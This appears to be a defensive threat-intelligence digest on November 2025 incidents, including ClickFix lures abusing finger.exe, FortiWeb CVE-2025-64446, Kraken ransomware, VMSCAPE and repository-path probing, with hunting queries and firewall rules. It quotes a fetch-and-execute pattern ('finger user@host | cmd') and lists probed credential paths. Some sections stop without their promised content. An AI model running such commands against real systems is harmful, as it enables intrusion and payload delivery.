SANS ISC documented a fresh KongTuke lure on November 18, 2025 that uses a fake CAPTCHA page and a ClickFix-style clipboard injection to run a PowerShell one-liner, which pulls a ZIP containing a malicious Python script and a bundled Windows Python runtime. Post-infection artifacts land under AppData\Roaming\DATA with persistence via a Scheduled Task; IOCs include multiple paths on 64.111.92[.]212:6655 and later HTTPS to telegra.ph, which itself is legitimate infrastructure often abused as an intermediary. See the primary diary for details and hashes (SANS ISC).

Fortinet has acknowledged active exploitation of a FortiWeb GUI path traversal that lets an unauthenticated attacker reach a CGI endpoint and impersonate users, including admins, to run privileged actions such as creating new administrator accounts (CVE-2025-64446) (Fortinet PSIRT FG-IR-25-910; NVD entry). SANS ISC’s Stormcast on November 17, 2025 highlighted widespread scanning and recommended treating exposed, unpatched appliances as compromised until proven otherwise (SANS Stormcast 2025-11-17). In parallel, ClickFix lures are leveraging Windows finger.exe to fetch follow-on commands over the legacy Finger protocol, making egress on TCP/79 a simple detection point (SANS ISC diary; BleepingComputer).

SANS Internet Storm Center reports that current ClickFix campaigns are abusing the built-in Windows finger.exe client to retrieve attacker-hosted scripts over the legacy Finger protocol. The tool isn’t proxy-aware and the destination port is fixed to 79/TCP, which means well-configured explicit egress proxies that block TCP/79 will break this stage. (isc.sans.edu)

Intrusion Flow

• Initial social engineering. ClickFix pages masquerade as “human verification” or problem/solution flows that preload a command into the clipboard and instruct the user to paste and run it. Recent variants add OS detection, countdown timers, and even video instructions to increase compliance. (bleepingcomputer.com)
• Fetch via Finger. In the finger.exe-enabled branch, the lure runs a command that uses Finger to pull a remote command stream and then pipes it into a shell for execution (for example, finger user@host | cmd). BleepingComputer documented live samples where the finger output is piped to cmd.exe to stage additional tooling. (bleepingcomputer.com)
• Payload staging. Observed scripts create working directories, rename built-in utilities (for example, curl.exe) and fetch archives masquerading as benign files, expanding to stealer or RAT payloads. (bleepingcomputer.com)
• Evolution to FileFix. Some crews now avoid terminals entirely, abusing the File Explorer address bar to execute hidden PowerShell (FileFix) as an evolution of the same idea. Expect the Finger fetch step to be swapped for other low-visibility transports over time. (bleepingcomputer.com)

Key Artifacts to Pull

• Process execution
  • Windows Security Event ID 4688 with command line (enable “Include command line in process creation events”). Hunt for finger.exe and any pipeline to cmd.exe/PowerShell. (learn.microsoft.com)
  • Sysmon Event ID 1 (ProcessCreate) for C:\Windows\System32\finger.exe and parent lineage (browser → cmd.exe → finger.exe, etc.). (learn.microsoft.com)
• Network evidence
  • Sysmon Event ID 3 (NetworkConnect) showing outbound TCP connections to remote port 79 with Image ...\finger.exe. (system32.eventsentry.com)
  • Windows Filtering Platform (WFP) events if “Audit Filtering Platform Connection” is enabled: 5156 (allowed) and 5157 (blocked), which include app path, IPs, and ports. (windows-security.org)
  • Host firewall logs (pfirewall*.log) if “log successful connections” and/or “log dropped packets” is enabled. (learn.microsoft.com)
• Disk artifacts (execution evidence)
  • Prefetch: FINGER.EXE-*.pf under C:\Windows\Prefetch (run count and up to eight last-run timestamps on Win 8+). (magnetforensics.com)
  • Amcache: C:\Windows\AppCompat\Programs\Amcache.hve can record program presence (and sometimes execution metadata); treat it as corroboration, not sole proof of execution. (securelist.com)

Detection Notes

• Microsoft Defender XDR (Advanced Hunting)
  • Process creation and network join:

    let lookback = 14d;
    let finger_execs = DeviceProcessEvents
      | where Timestamp > ago(lookback)
      | where FileName =~ "finger.exe";
    let finger_net = DeviceNetworkEvents
      | where Timestamp > ago(lookback)
      | where RemotePort == 79 and Protocol =~ "Tcp";
    finger_execs
      | project Timestamp, DeviceName, InitiatingProcessAccountName, ProcessCommandLine, FolderPath, ProcessId
      | join kind=leftouter (
          finger_net | project Timestamp, DeviceName, RemoteIP, RemotePort, InitiatingProcessId, InitiatingProcessCommandLine
        ) on $left.DeviceName == $right.DeviceName and $left.ProcessId == $right.InitiatingProcessId
      | order by Timestamp desc
    

    Uses DeviceProcessEvents and DeviceNetworkEvents schemas. (learn.microsoft.com)
  • Suspicious pipeline usage:

    DeviceProcessEvents
    | where Timestamp > ago(14d)
    | where FileName =~ "cmd.exe" or FileName =~ "powershell.exe"
    | where ProcessCommandLine has "finger " and ProcessCommandLine contains "|"
    

    Back this with network to TCP/79 where available. (learn.microsoft.com)
• Windows Eventing/Sysmon
  • Enable Security 4688 with command line and Sysmon IDs 1 and 3; filter on Image endswith \\finger.exe and DestinationPort = 79. (learn.microsoft.com)
• Packet capture/NIDS
  • Finger is TCP/79; on packet tools, filter tcp.port == 79. Zeek has historically provided a Finger analyzer, but check your version and plugin set-many deployments will simply rely on conn.log for port 79 traffic. (iana.org)

Response Guidance

• Contain egress on TCP/79
  • The attacking step depends on direct TCP/79 to the Internet. Block 79/TCP egress from user segments at your perimeter and host firewalls. This aligns with baseline control guidance to default-deny outbound on endpoints and only allow required services. (isc.sans.edu)
  • Example (local host firewall, admin CMD):

    netsh advfirewall firewall add rule name="Block TCP79 Outbound" dir=out action=block protocol=TCP remoteport=79
    

    Or deploy an outbound port rule via GPO/MDM at scale. (learn.microsoft.com)
• Proxy design
  • finger.exe is not proxy-aware; in environments with explicit proxies and default-deny egress, the fetch will fail. In transparent proxy setups, ensure port 79 is denied outbound. (isc.sans.edu)
• Endpoint hardening
  • Where feasible, block or tightly scope finger.exe via AppLocker/WDAC policy (publisher/path/hash rule), while monitoring for operational impact. (learn.microsoft.com)
• Host triage
  • Isolate the system; collect Security 4688, WFP 5156/5157, Sysmon 1/3, Prefetch, Amcache, and firewall logs. Review the parent chain that launched finger.exe and any subsequent curl/PowerShell activity to determine secondary payloads. (learn.microsoft.com)
• User comms
  • Re-educate on ClickFix patterns: fake Cloudflare checks, clipboard-injected commands, “Win+R → Ctrl+V → Enter,” and the Explorer address-bar variant (FileFix). (securityweek.com)

Takeaways

• Add hunts and detections for finger.exe execution and outbound TCP/79 connections; block TCP/79 egress broadly. (isc.sans.edu)
• Treat any finger ... | cmd/PowerShell pipeline as high-signal and pivot to payload retrieval and persistence checks. (bleepingcomputer.com)
• Reinforce application control and user training to blunt evolving ClickFix/FileFix social-engineering chains. (bleepingcomputer.com)

FortiWeb CVE-2025-64446: Path Traversal + CGI impersonation yields admin on-box

On November 14, 2025, watchTowr published a hands-on analysis of Fortinet FortiWeb CVE-2025-64446 showing an auth bypass chain: a path traversal to the fwbcgi binary, plus a crafted Base64-encoded CGIINFO header that causes user impersonation and enables privileged actions like creating local admin accounts (watchTowr write-up). Fortinet has issued PSIRT advisory FG-IR-25-910 for CVE-2025-64446, with fixes in 8.0.2 and corresponding maintenance branches; multiple CERTs note active exploitation (CERT-FR bulletin, Canadian Centre for Cyber Security alert, and NVD entry). (labs.watchtowr.com)

On November 13, 2025, reporting highlighted that the cross-platform Kraken ransomware profiles victim machines first, benchmarking disk/CPU to choose between full or partial encryption and tune threads to avoid tripping resource alarms BleepingComputer. Cisco Talos’ deep dive confirms host-side performance tests via a temporary file and command-line switches, plus distinct encryptors for Windows and Linux/VMware ESXi that append “.zpsc” and drop “readme_you_ws_hacked.txt” Talos. Talos also notes ties to the older HelloKitty operation and a Kraken-hosted forum announcement (“The Last Haven Board”), a link also observed by independent analysis of Kraken’s leak site Talos Cyjax.

Microsoft’s November 11, 2025 Patch Tuesday addressed 63 vulnerabilities and one actively exploited Windows Kernel local privilege escalation tracked as CVE-2025-62215, a race-condition bug enabling SYSTEM after an attacker wins a concurrency window locally. Microsoft credits MSTIC and MSRC for discovery, and the flaw is rated CVSS 7.0 (important) with active exploitation confirmed. DFIR teams should expect this to be used post-compromise to elevate from a low-priv foothold. Patch fast, and hunt for privilege jumps and follow-on activity. BleepingComputer, The Hacker News, Tenable, NVD.

North Korea-linked operators in the KONNI/APT37 orbit used stolen Google credentials to log into Google’s Find Hub and remotely trigger factory resets on victims’ Android phones and tablets, timing the wipes after checking GPS location to isolate targets and delay response (BleepingComputer, Nov 10, 2025; Genians Security Center report). Find Hub is Google’s rebranded “Find My Device” service that supports locating, locking, and erasing devices (Google Find Hub about; Android Authority rebrand coverage).

Canonical published USN-7860-5 on November 10, 2025 for Ubuntu 24.04 LTS HWE (6.14) to mitigate VMSCAPE (CVE-2025-40300), a Spectre-class issue where insufficient branch-predictor isolation lets a guest VM influence host userspace execution and leak data from processes like QEMU. The notice requires updating to 6.14.0-35 and rebooting; it also flags an ABI bump that will rebuild third-party kernel modules. (ubuntu.com)

Intrusion Flow

• Guest training: A malicious guest poisons branch-predictor state (vBTI) while executing under KVM. On VMEXIT, host userspace (e.g., QEMU) runs with the tainted predictor, enabling Spectre-BTI-style mis-speculation and data disclosure via a cache side channel. (intel.com)
• Target surface: The attack impacts userspace hypervisors; existing kernel/KVM Spectre defenses are not sufficient because the userspace VMM can run immediately after VMEXIT without a context switch. (ubuntu.com)
• Practicality: Researchers report end-to-end exfiltration from a host userspace hypervisor, with measured leak rates on modern CPUs in public write-ups. (linuxjournal.com)
• Affected CPUs: Kernel documentation lists Intel Skylake (parts without eIBRS), Cascade Lake (ITS guest/host separation), and Alder Lake and newer (BHI), plus AMD Zen families 0x17/0x19/0x1a and Hygon 0x18. Some BHI-affected Intel parts using BHB clearing (e.g., Icelake) are not vulnerable. (docs.kernel.org)
• Kernel mitigation model: Linux adds conditional branch-predictor flushing around VMEXIT-IBPB before returning to userspace-and offers a more aggressive IBPB-on-every-VMEXIT mode; vendors note existing BTI/BHI guidance applies. (docs.kernel.org)

Key Artifacts to Pull

When you’re triaging Ubuntu virtualization hosts, collect:

On November 8, 2025, the SANS Internet Storm Center reported honeypot hits probing common repository and cloud-related paths, including /.git/logs/refs/remotes/origin/main, /.git/objects/info, /.github/* (such as dependabot.yml), /.gitlab/*, /.gitlab-ci, /.git-secret, /.svnignore, and cloud-y paths like /aws/bucket, /s3/backup, /s3/bucket, /s3/credentials (ISC Diary). If any of these return 200s, you may be serving source, CI config, or credentials. The rest of this post walks through a fast, repeatable response.

Intrusion Flow

• Recon and probing: Automated clients request telltale repo/CI paths such as /.git/HEAD, /.git/config, .github/*, .gitlab-ci*, .svn/*, or /s3/* looking for misdeployments (PortSwigger, GitHub Docs: dependabot.yml location, GitLab CI YAML).
• Exploitation if exposed: If /.git/ is reachable, attackers can reconstruct history via targeted downloads (e.g., /.git/HEAD, refs, objects) or off-the-shelf dumpers (arthaud/git-dumper, GitTools). Advisory sites treat exposed VCS dirs as source disclosure risks (Acunetix on .git).
• Post-exploitation: Harvest secrets embedded in history or CI files using secret scanners; leaked tokens often enable cloud pivots (Gitleaks, TruffleHog).
• Cloud angle: Attackers also test S3 naming or credential endpoints; your guardrail here is account/bucket-level S3 Block Public Access-on by default for new buckets since April 28, 2023, and recommended broadly (AWS Prescriptive Guidance, S3 BPA user guide, AWS announcement).

Key Artifacts to Pull

• Web access logs from the serving tier (reverse proxies, WAFs, app servers):
  • NGINX: confirm actual log file and format via access_log and log_format (defaults vary by distro; see NGINX module docs) (nginx log module, admin logging guide).
  • Apache HTTPD: Combined Log Format reference and locations configured via CustomLog (Apache docs).
  • IIS: W3C logs (fields like cs-uri-stem, cs-uri-query, sc-status) and log storage under W3SVC; field list in Microsoft documentation (Microsoft Learn, W3C logging fields, IIS logging overview).
• Server configs for containment validation:
  • NGINX: location ~ /\.(?!well-known) { deny all; } is a common pattern to block dotfiles while allowing ACME challenges (Bolt CMS nginx example).
  • Apache: <FilesMatch "^\."> Require all denied </FilesMatch> blocks dotfiles (Apache core / ).
• Evidence if exposure occurred:
  • Sample served files (e.g., /.git/HEAD, /.git/config, .gitlab-ci.yml) for scoping; prefer capturing over the wire evidence and hash it in your case notes.
  • HTTP status codes context: 200 means the resource was served; 403 means refused; 404 means not found (MDN 200, MDN 403, MDN 404).

Detection Notes

The goal is to quickly identify requests to risky repo/CI/cloud paths and prioritize 200s.

Google shipped ChromeOS Long-Term Support (LTS) 138.0.7204.296 (Platform 16295.81.0) on November 7, 2025, with security fixes for Safe Browsing (CVE-2025-11756), Storage (CVE-2025-11460), V8 (CVE-2025-12036), and libaom (CVE-2025-8879). Confirm the OS and platform versions during triage and push the update across your fleet. (chromereleases.googleblog.com)

Intrusion Flow

• Likely initial vector: drive-by or content rendering via the Chrome browser on ChromeOS that triggers memory-safety bugs in browser components (Safe Browsing, Storage, V8) or the AV1 codec library (libaom), leading to crash or potential code execution in the browser context. Chrome Stable channel notes for CVE-2025-11756 (Safe Browsing) and CVE-2025-11460 (Storage) confirm high-severity use-after-free issues; CVE-2025-12036 is an “inappropriate implementation” in V8; CVE-2025-8879 is a heap buffer overflow in libaom. (chromereleases.googleblog.com)
• On ChromeOS, crashes and related telemetry are collected by crash-reporter; browser and system crashes produce minidumps and logs in specific locations (see “Key Artifacts”). (chromium.googlesource.com)
• Update application is handled by update_engine; successful or failed updates leave traces in update_engine logs. (chromium.googlesource.com)

Key Artifacts to Pull

• Version and channel evidence
  • UI: Settings > About ChromeOS (records current ChromeOS version) and chrome://version (shows browser and platform versions). Capture screenshots or export the page during triage. (chromium.org)
  • Admin inventory: ChromeOS device records expose osVersion and platformVersion via the Directory API. Pull device lists or per-device records to validate fleet posture. (developers.google.com)
• Update traces
  • update_engine logs at /var/log/update_engine and the active symlink /var/log/update_engine.log. These record payload URL, state transitions, success/failure, and rollback markers. (chromium.googlesource.com)
• Browser/system logs
  • Chrome logs before login: /var/log/chrome/chrome; after login (non-test images): /home/chronos/user/log/chrome; early Chrome startup: /var/log/ui/ui.LATEST. (chromium.googlesource.com)
  • System logs: /var/log/messages and related rsyslog outputs can clarify browser startup/shutdown and service behavior. (chromium.googlesource.com)
• Crash evidence
  • Crash report storage: system crashes in /var/spool/crash/; user-session crashes under /run/daemon-store/crash/<user_hash>/; logged-out Chrome crashes in /home/chronos/crash/. Also check /var/log/chrome/Crash\ Reports/uploads.log for upload status. (chromium.googlesource.com)
  • chrome://crashes shows IDs when user consented to crash reporting; minidumps can be symbolized with tast symbolize for deeper analysis. (chromium.org)

Detection Notes

• Hunt for crash spikes or recurring signatures matching affected components:
  • Strings to grep in Chrome logs and minidumps: “SafeBrowsing”, “storage”, “V8”, “libaom”, “aom”. Combine with timestamps around user browsing sessions. Use Chrome logs and crash directories noted above. (chromium.googlesource.com)
• Correlate update success/failure with exploitation windows:
  • Parse /var/log/update_engine.log for state=UPDATED_BUT_DEFERRED, failures, or rollbacks; align with crash timestamps to spot exposure pre-patch. (chromium.googlesource.com)
• Fleet-level posture:
  • Query the Admin Directory API for devices not yet at Chrome 138.0.7204.296 (LTS milestone 138) using version search operators (example below). Device records also return platformVersion for cross-checks. (developers.google.com)

Example Directory API filter (Admin console/API search syntax supports prefix matching on Chrome version):